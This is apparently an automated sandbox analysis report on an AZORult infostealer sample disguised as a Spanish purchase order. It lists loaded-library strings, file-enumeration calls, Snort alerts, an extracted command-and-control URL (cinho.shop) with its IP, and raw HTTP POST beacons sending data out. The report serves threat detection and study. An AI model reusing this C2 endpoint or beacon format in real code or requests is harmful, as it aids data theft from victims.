Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283893964.000000000826C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.268086743.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289559436.0000000007834000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266110570.0000000008394000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.265641906.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdb source: cvtres.exe, 00000001.00000003.276245137.00000000066AC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.290995859.0000000007858000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289559436.0000000007834000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.1.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283893964.000000000826C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283972789.0000000008270000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266461893.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283512359.0000000008234000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283366893.0000000008228000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267167676.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283409391.000000000822C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283458551.0000000008230000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.1.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266581701.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.1.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270034811.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270237118.0000000006694000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.264625947.0000000008398000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.268329300.0000000007874000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278062158.00000000081E8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278187484.00000000081EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.265086491.0000000008398000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278214445.00000000081F0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.264949325.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278227969.00000000081F4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278062158.00000000081E8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278187484.00000000081EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278214445.00000000081F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.267898785.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283784153.000000000825C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.268979819.0000000007870000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.1.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,	1_2_004098A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040D0A0 FindFirstFileW,	1_2_0040D0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	1_2_00414408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00408D44 FindFirstFileW,GetFileAttributesW,	1_2_00408D44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00415610 FindFirstFileW,FindNextFileW,FindClose,	1_2_00415610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,	1_2_004087DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040D06E FindFirstFileW,	1_2_0040D06E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0041303C FindFirstFileW,FindNextFileW,FindClose,	1_2_0041303C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040989F FindFirstFileW,FindNextFileW,FindClose,	1_2_0040989F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,	1_2_004111C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	1_2_00414408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00415610 FindFirstFileW,FindNextFileW,FindClose,	1_2_00415610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	1_2_00412D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	1_2_00412D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00408D3C FindFirstFileW,GetFileAttributesW,	1_2_00408D3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	1_2_00412D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0041158C FindFirstFileW,FindNextFileW,FindClose,	1_2_0041158C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00411590 FindFirstFileW,FindNextFileW,FindClose,	1_2_00411590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,	1_2_00412D9C

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2029467 ET TROJAN Win32/AZORult V3.3 Client Checkin M14 192.168.2.7:49701 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2810276 ETPRO TROJAN AZORult CnC Beacon M1 192.168.2.7:49701 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2029137 ET TROJAN AZORult v3.3 Server Response M2 188.114.97.3:80 -> 192.168.2.7:49701

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://cinho.shop/PL341/index.php

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: cinho.shopContent-Length: 95Cache-Control: no-cacheData Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 62 ec 47 14 8b 30 6d eb 26 66 9c 26 67 ea 26 66 98 26 66 97 26 66 99 42 16 8b 30 62 ef 47 70 9c 47 11 8b 30 65 e8 41 17 ec 45 17 Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b0bG0m&f&g&f&f&fB0bGpG0eAE
Source: global traffic	HTTP traffic detected: POST /PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: cinho.shopContent-Length: 47875Cache-Control: no-cache

Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: NUEVA ORDEN-MATSA 10-2022,.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: NUEVA ORDEN-MATSA 10-2022,.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: NUEVA ORDEN-MATSA 10-2022,.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: cvtres.exe, 00000001.00000002.299718403.0000000006690000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cinho.shop/PL341/index.php
Source: cvtres.exe, 00000001.00000002.299718403.0000000006690000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cinho.shop/PL341/index.phpA
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: NUEVA ORDEN-MATSA 10-2022,.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: NUEVA ORDEN-MATSA 10-2022,.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: NUEVA ORDEN-MATSA 10-2022,.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
